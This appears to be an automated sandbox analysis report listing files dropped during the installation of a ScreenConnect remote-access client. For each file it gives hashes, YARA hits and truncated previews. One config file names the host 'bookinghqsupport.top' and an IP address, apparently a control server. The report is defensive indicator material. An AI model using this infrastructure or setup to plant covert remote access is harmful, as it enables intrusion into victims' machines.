                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3995610
                                                                                                                          Entropy (8bit):7.324865565216482
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4B6C036E-28DA-1655-4F4C-DB2C91ACA822}, Create Time/Date: Wed Dec 18 21:40:44 2024, Last Saved Time/Date: Wed Dec 18 21:40:44 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13361152
                                                                                                                          Entropy (8bit):7.969161188685618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:341EB858232111D75C8F6B83E99EA758
                                                                                                                          SHA1:A15296235E7E10618F6888F2AE529B2FA0636DFF
                                                                                                                          SHA-256:9CA84CCEDA9BB56D2D37490145FF8A1C8F4A557188112CC9CCE4FA6C18BB1506
                                                                                                                          SHA-512:2452C408F8682A469D89E48423E8E80B338C422DA63315C9C1AAC03F2B54CD02A2BF7327648CEA1050E07526388E8D9E70863A13E9107927DAC37FDC6F129646
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):423907
                                                                                                                          Entropy (8bit):6.577418641651606
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:8F7D9AFE3859615D84F35C722692241E
                                                                                                                          SHA1:10E1F00608A545C35F502930C708CBB65B9A2618
                                                                                                                          SHA-256:D1A0C9130F20CE5304B5AEBF7714EBF07EA8EDA986C84D8F366E68BB0B851FE6
                                                                                                                          SHA-512:E5644540BE6EB84B639711003AA371C7DCA4DD94F1583C267999E2987829B0C21C8980D2A4D45EA459FB0F3365F49AAEF79363EEF72CD9DFAB912A05CEA3F46C
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI4F17.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI4F17.tmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI4F17.tmp, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...@IXOS.@.....@=.gZ.@.....@.....@.....@.....@.....@......&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}'.ScreenConnect Client (d241e538b9eb3f0a)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d241e538b9eb3f0a)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{D2F68EAD-292A-9089-63C0-8EAF92A6C63B}^.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{BD5627A3-7902-96F8-0A61-8DBE6A166677}f.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{0D7A6851-490B-572E-514A-79D15C14EAE4}c.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileMa
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):207360
                                                                                                                          Entropy (8bit):6.573348437503042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.1724533911885513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4B29D33671D2582F20CE02F5DEBF09A4
                                                                                                                          SHA1:248AA2DC49842F0F52D1DAEEE9E1C8E2AC0CE332
                                                                                                                          SHA-256:0FCEAED4998081589CD78AAC443ADA053C50B47B1CD59EFFACEFB73F5F9CDEE8
                                                                                                                          SHA-512:14B016E0C11C2EE4DBE93E4D1C852D654F91D70815B7311194BEF3269E6D040F9F881FA2F1C891466B87D44AE08295F9E5A43184000257E1FCC92C03FFF4F168
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.8129754009103798
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:509B05754D941EE8ACD3186E545F344C
                                                                                                                          SHA1:F66DD244E7DAF2BECEABE1B60F9EF12579252942
                                                                                                                          SHA-256:7E3CE911A8C0F18157EDDF55C893BEEB8CAE975D647AE2FBB1EF57CF1A99943C
                                                                                                                          SHA-512:F1F9D885756580871239B8251CD63FE8B2E2CCA77650A290C6A9EC522B87B48F0448EA04F93F2BD2B3DB66D0C9C640F738904173CB90D7B2D8ABE4FA10D138E7
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):435
                                                                                                                          Entropy (8bit):5.289734780210945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                          SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                          SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                          SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):454234
                                                                                                                          Entropy (8bit):5.356157423829987
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:B607A60EA0CA8C5406A3F743C122C3F0
                                                                                                                          SHA1:8866ACD914BCA8AB17AB8CC4B5A27A24CF0BE4A4
                                                                                                                          SHA-256:B5F1168C1DE186E5EC8C84754C9D6271E3F85B3E938617189C2377588A38E712
                                                                                                                          SHA-512:58E7FA22482574F63D1B7D0D02B30689CDD9C4E2F4B8A3ED928ACCAFF84705212D56E326DACDEA5C8D682F08C28B83D38161F87690AD74F92B318BAC53997AA2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7388
                                                                                                                          Entropy (8bit):3.243751351469083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:87A875D6E02C7CC2F22C92DB296D9D71
                                                                                                                          SHA1:8F5B5514104DE262FCA53D76A3C3A719AD9E5394
                                                                                                                          SHA-256:3E39AEAD8B782C9FDD88EA80125F97B4E71C71AF3255AB4257E4FB19F691881E
                                                                                                                          SHA-512:E92BCD4E2A48E615EAE314A1AE3C1B44279E5A0591D9666571B601B065B7E95F94BDEC78E49717C67C1808220656DB3E977A88321DCFCC6358898816A1CE37F0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):566
                                                                                                                          Entropy (8bit):5.056013404488193
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:89A844128ABE2D072A16665555D1F365
                                                                                                                          SHA1:1217E1B685D733EB4AD0C1EB023426FF682608FB
                                                                                                                          SHA-256:4B2CE3FE3814F007F51E4F59858E4D897DE950E9F072CFE4CBD3B86248E5F730
                                                                                                                          SHA-512:980BF9CBA61888F3DE8ED49D79302C373A7704065DF7BAA46ED831DEC3FE4BF06664B64E511EF1ECF7AC350CF7061A1C28FB73AEF9E32C1972FC0D2FCA96489E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bookinghqsupport.top=199.127.62.110-07%2f03%2f2025%2022%3a33%3a57</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:89A844128ABE2D072A16665555D1F365
                                                                                                                          SHA1:1217E1B685D733EB4AD0C1EB023426FF682608FB
                                                                                                                          SHA-256:4B2CE3FE3814F007F51E4F59858E4D897DE950E9F072CFE4CBD3B86248E5F730
                                                                                                                          SHA-512:980BF9CBA61888F3DE8ED49D79302C373A7704065DF7BAA46ED831DEC3FE4BF06664B64E511EF1ECF7AC350CF7061A1C28FB73AEF9E32C1972FC0D2FCA96489E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bookinghqsupport.top=199.127.62.110-07%2f03%2f2025%2022%3a33%3a57</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.07762588309624781
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6B14CB86A39DECC29CD0D2CF9CE37548
                                                                                                                          SHA1:30FC5993F22257D80A9FB8B21FF40F002519FFBD
                                                                                                                          SHA-256:DE5C1E84B2337C6BA238782F5BFC2278407CDA43CC127BB1BA246A3C3035F88E
                                                                                                                          SHA-512:09E3949DB5593C220201559C018D892548BE35384691525D79AAA4D87D6999CAFF8FC82F341D33E043DEDA318A592A1092F9D958276B95A6F4D8714ECA6A1598
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):0.23929088127443526
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D5037876B9B3752AA855A1893C780CE7
                                                                                                                          SHA1:546F4AC74D290887B24C04FD9F3127434CF63F6A
                                                                                                                          SHA-256:981043593AEE5EC7D6D625EED0CDAFEE04A8236A68D256D1EFB70F4099103AE8
                                                                                                                          SHA-512:1D1029CA746C433B23139443AFF69962178CDC36637E48843DA48811419AFE85BA9FE2EA1950588E86E430A2A9E6B22A8A3BF597227BEA4C65BAFD5533E6075C
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):1.4300001970237424
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A5247CC0C325E9814CAA82FFD391804F
                                                                                                                          SHA1:4F7469577F01C897E2CEA94CE929DF1EA2127FE3
                                                                                                                          SHA-256:EA6867771693785D6DEC7F8B9D20E0CE8D33B34A0B4523FFBADF4678C7CA887E
                                                                                                                          SHA-512:7CA9DCBFF75073F8389126804E4E6F1266376A25BCD09D872DEF5B13FB37119529D92A17ABBB97D5DA13847DB09C4607884094C5C76C3F272953934A2FEC8173
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (12918)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):13482
                                                                                                                          Entropy (8bit):5.2784390907629355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D3070794E13DC3BBC8A51FB870386CE6
                                                                                                                          SHA1:80333DAD87995542B9F206809750D477C67E65AC
                                                                                                                          SHA-256:C9CB4D926CBE04BE8365B7A2B9F808AAAA2F38C6F88181FC2B92BD87DD21D758
                                                                                                                          SHA-512:54ADC554E2C2562B8F34466650DD7B712C30AE1A3A34BC229CE96501C3F3ED93A76327C9B31BC8195565228BA84F8E26358955DB4F620507B10FA2BB0030DE28
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://syndicatedsearch.goog/afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=00001&domain_name=oceanbreeze.com&client=dp-namemedia01&r=m&rpbu=https%3A%2F%2Foceanbreeze.com%2Flander&type=3&uiopt=true&swp=as-drid-oo-1502969727449347&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301437%2C17301439%2C17301442%2C17301548%2C17301266%2C72717107&format=r3&nocache=9381741386831140&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=2&u_tz=-300&dt=1741386831142&u_w=1280&u_h=1024&biw=1280&bih=897&psw=1280&psh=897&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=732930958&rurl=https%3A%2F%2Foceanbreeze.com%2Flander&referer=http%3A%2F%2Foceanbreeze.com%2F
                                                                                                                          Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):200
                                                                                                                          Entropy (8bit):5.032268383518208
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
